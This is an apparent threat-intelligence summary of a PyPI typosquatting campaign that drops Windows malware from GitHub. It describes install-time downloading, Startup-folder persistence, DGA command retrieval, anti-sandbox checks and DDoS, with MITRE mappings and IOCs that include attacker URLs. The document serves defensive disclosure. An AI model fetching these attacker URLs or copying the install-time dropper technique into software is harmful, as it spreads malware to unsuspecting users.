A Checkmarx analysis details a large typosquatting campaign targeting Python’s top packages that drops Windows malware hosted on GitHub and uses a domain-generation algorithm for C2. The operation also includes DDOS capabilities, anti-sandbox tricks, and persistence via Startup folder, with extensive reverse engineering and IOC disclosure. #devfather777 #jagermager999 #CS1_6 #PythonTyposquatting #Checkmarx
Keypoints
- Typosquatting on PyPI targeted popular Python packages (e.g., idna, flask, docutils) to weaponize installations.
- Malicious PyPI packages execute code at install time to download and run a Windows executable from GitHub.
- The dropped payload persists by copying itself into the Windows Startup folder and installs a root CA certificate.
- The malware uses a Domain Generation Algorithm (DGA) to fetch configuration and later commands from GitHub-hosted files.
- Anti-sandbox checks (sleep loops and performance counters) are built into the malware to evade analysis.
- DDOS capabilities are added to launch attacks against a Counter-Strike 1.6 Russian server, driven by infected hosts.
- Extensive reverse engineering and IOC disclosure (hashes, URLs, domains) were performed and shared by the researchers.
MITRE Techniques
- [T1195] Supply Chain Compromise – ‘The PyPi user account devfather777 published a dozen malicious Typosquatting packages under the names of popular projects with slight permutation.’
- [T1105] Ingress Tool Transfer – ‘the malicious packages contained a code executed upon installation which download and execute a windows executable hosted on GitHub’
- [T1059] Command and Scripting Interpreter – ‘the following Python code, embedded in the malicious package’s setup.py file, checks if the victim’s operating system is Windows. If not, it quits and if so, it continues and downloads the file test.exe’
- [T1547.001] Boot or Logon Autostart – ‘Placing itself in the Startup directory makes the malware persistent by executing itself after every reboot’
- [T1497] Virtualization/Sandbox Evasion – ‘anti-sandbox code inside has multiple “sleep” attempts and performance counts measurements’
- [T1483] Domain Generation Algorithms – ‘Domain Generation Algorithm (DGA)’ and the pattern of generated endpoints used for C2/config retrieval
- [T1041] Exfiltration Over C2 Channel – ‘telemetry to a unique generated pixel URL provided by the free legitimate service https://iplogger.org/’
- [T1499] Endpoint Denial of Service – ‘Attack Objective — DDOS’ and the note about targeting a CS1.6 server
Indicators of Compromise
- [Hash] 97053af6922baa9d199a4fa04c461728ac636b8161bd5295c3e847bc0adbe360 – File hash of the dropped payload
- [Hash] b209471a23252018d8424139fafcaa8fe7b200ea – File hash (SHA-1) observed in IOC list
- [Hash] a2f9c46844fb65c1a71bbd58a484f9f1 – MD5 hash of the sample
- [URL] https://raw.githubusercontent.com/jagermager999/8746465cdg78cdsxasy8a/main/test.txt – Initial configuration file URL used by the malware
- [URL] https://iplogger.org/1RUEV4 – Telemetry/pixel URL used to exfiltrate victim data
- [Domain] raw.githubusercontent.com – Used to host test.txt and main.js (GitHub CDN)
- [Domain] iplogger.org – Telemetry collection service
- [File] test.exe – Windows executable downloaded and executed by the malicious package
- [File] tmp_file_pypi_29x7d0kf8.exe – Temporarily saved filename before execution
- [File Path] C:UsersAppDataRoamingMicrosoftWindowsStart MenuProgramsStartupppvcc.exe – Startup folder persistence path
- [Certificate] Root CA CN “Some Company” installed system-wide (expired 2020-09-28) – persistence/cred-related impact
- [URL] hxxps://raw.githubusercontent.com/ds8xzki890dsq2a1/1/master/main.js – DGA-generated fetch target (obfuscated in article)